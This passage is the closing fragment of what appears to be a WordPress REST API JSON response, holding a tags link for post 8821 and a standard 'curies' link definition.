p\/v2\/tags?post=8821"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}